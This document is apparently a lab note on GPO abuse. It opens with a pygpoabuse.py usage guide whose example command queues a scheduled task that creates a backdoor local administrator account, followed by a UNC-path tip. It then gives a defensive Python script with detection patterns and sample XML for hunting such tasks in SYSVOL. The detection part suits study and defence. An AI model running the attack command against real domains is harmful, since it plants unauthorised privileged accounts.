# pygpoabuse.py
Very cool utility to abuse GPOs on which you hold excessive permissions, such as GenericWrite. Here's an example:
```
pygpoabuse.py north.sevenkingdoms.local/samwell.tarly:'Heartsbane' -gpo-id "THE ID YOU COPIED MINUS THE CURLY BRACES" -command "net user BACKDOORUSER Mypass123! /add && net localgroup administrators YOURSTUDENTLOGIN /add" -taskname "Whatever you wanna call the task" -v
```
In the command above:

- `THE ID YOU COPIED MINUS THE CURLY BRACES` is exactly that: the ID you copy off the GPO in BloodHound, minus the curly braces.
- `BACKDOORUSER` would be a local admin account you want to install on the system.
- `Mypass123!` is the password that will be assigned to your backdoor account. IMPORTANT: MAKE THE PASSWORD FEWER THAN 14 CHARACTERS! (`net user` prompts for confirmation on longer passwords, and a non-interactive scheduled task cannot answer that prompt.)
- `-taskname "Whatever you wanna call the task"` is exactly that: some name for the scheduled task that gets queued up behind the scenes.
## Tip

When using this to run a command that contains a UNC path, such as `-command "certutil -syncwithwu \\\\10.1.2.3"`, escape each backslash in the path with a second backslash.
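The "scheduled task that gets queued up behind the scenes" is the artifact a defender can hunt for: it lands in the GPO's Group Policy Preferences `ScheduledTasks.xml` under SYSVOL. The script below is an added example for the defensive side, not part of pygpoabuse, and it parses such a file and flags immediate SYSTEM tasks whose command line creates a local account, adds it to Administrators, or reaches out to a UNC path. The sample XML is constructed to mirror the GPP scheduled-task layout (`TaskV2`/`ImmediateTaskV2` elements with `Properties`, `runAs` and `Exec`/`Command`/`Arguments`); clsid GUID attributes are omitted, and the element and attribute names are assumptions to check against a real file from your own domain.

```python
"""Hunt for suspicious immediate scheduled tasks in a GPP ScheduledTasks.xml.

Added defensive example; not part of pygpoabuse. The XML layout below is an
assumption modelled on Group Policy Preferences scheduled-task files.
"""
import re
import xml.etree.ElementTree as ET

# Constructed sample: a benign recurring task plus an immediate SYSTEM task
# that creates a local account and adds it to Administrators.
SAMPLE_XML = """<ScheduledTasks>
  <TaskV2 name="Inventory" image="2" changed="2023-01-10 09:00:00" uid="{11111111-1111-1111-1111-111111111111}">
    <Properties action="U" name="Inventory" runAs="NT AUTHORITY\\System" logonType="S4U">
      <Task version="1.3">
        <Actions Context="Author">
          <Exec><Command>C:\\Tools\\inventory.exe</Command><Arguments>/quiet</Arguments></Exec>
        </Actions>
      </Task>
    </Properties>
  </TaskV2>
  <ImmediateTaskV2 name="Whatever" image="0" changed="2023-01-11 02:13:00" uid="{22222222-2222-2222-2222-222222222222}">
    <Properties action="C" name="Whatever" runAs="NT AUTHORITY\\System" logonType="S4U">
      <Task version="1.3">
        <Actions Context="Author">
          <Exec><Command>cmd.exe</Command><Arguments>/c net user BACKDOORUSER Mypass123! /add &amp;&amp; net localgroup administrators BACKDOORUSER /add</Arguments></Exec>
        </Actions>
      </Task>
    </Properties>
  </ImmediateTaskV2>
</ScheduledTasks>
"""

# Command-line patterns worth a second look in any GPO-deployed task.
SUSPICIOUS_PATTERNS = [
    (re.compile(r"\bnet1?(?:\.exe)?\s+user\s+\S+\s+\S+\s+/add\b", re.I), "local account creation"),
    (re.compile(r"\bnet1?(?:\.exe)?\s+localgroup\s+administrators\s+\S+\s+/add\b", re.I), "addition to local Administrators"),
    (re.compile(r"\\\\[\w.\-]+\\"), "UNC path in command line"),
]


def iter_tasks(xml_text):
    """Yield one dict per task element (TaskV2, ImmediateTaskV2, ...).

    SYSVOL is domain-controlled data, but use defusedxml for untrusted input.
    """
    root = ET.fromstring(xml_text)
    for task in root:
        props = task.find("Properties")
        if props is None:
            continue
        # A task may carry several Exec actions; join them for matching.
        cmd_parts = []
        for ex in props.iter("Exec"):
            command = ex.findtext("Command", default="")
            args = ex.findtext("Arguments", default="")
            cmd_parts.append(f"{command} {args}".strip())
        yield {
            "kind": task.tag,
            "name": task.get("name", ""),
            "uid": task.get("uid", ""),
            "changed": task.get("changed", ""),
            "run_as": props.get("runAs", ""),
            "command_line": " ; ".join(cmd_parts),
        }


def score_task(task):
    """Return the list of reasons a task looks like GPO abuse (empty if none)."""
    reasons = []
    immediate = task["kind"] == "ImmediateTaskV2"
    as_system = task["run_as"].lower().endswith("system")
    if immediate:
        reasons.append("immediate task (runs once at next policy refresh)")
    if as_system:
        reasons.append("runs as SYSTEM")
    pattern_hits = [label for pattern, label in SUSPICIOUS_PATTERNS
                    if pattern.search(task["command_line"])]
    reasons.extend(pattern_hits)
    # SYSTEM tasks are normal; flag only a command hit or an immediate SYSTEM task.
    if not pattern_hits and not (immediate and as_system):
        return []
    return reasons


def find_suspicious(xml_text):
    """Return every task from the XML that score_task() considers suspicious."""
    findings = []
    for task in iter_tasks(xml_text):
        reasons = score_task(task)
        if reasons:
            findings.append({**task, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in find_suspicious(SAMPLE_XML):
        print(f"[!] {finding['kind']} '{finding['name']}' changed {finding['changed']}")
        print(f"    cmd: {finding['command_line']}")
        for reason in finding["reasons"]:
            print(f"    - {reason}")
```

Point `find_suspicious` at the `ScheduledTasks.xml` files under each GPO's `Machine\Preferences\ScheduledTasks\` directory in SYSVOL and correlate the `changed` timestamp with directory-service change events on the GPO; the tool name on this page also stands out because the task it creates is an immediate task, which is rarely used by legitimate administrators.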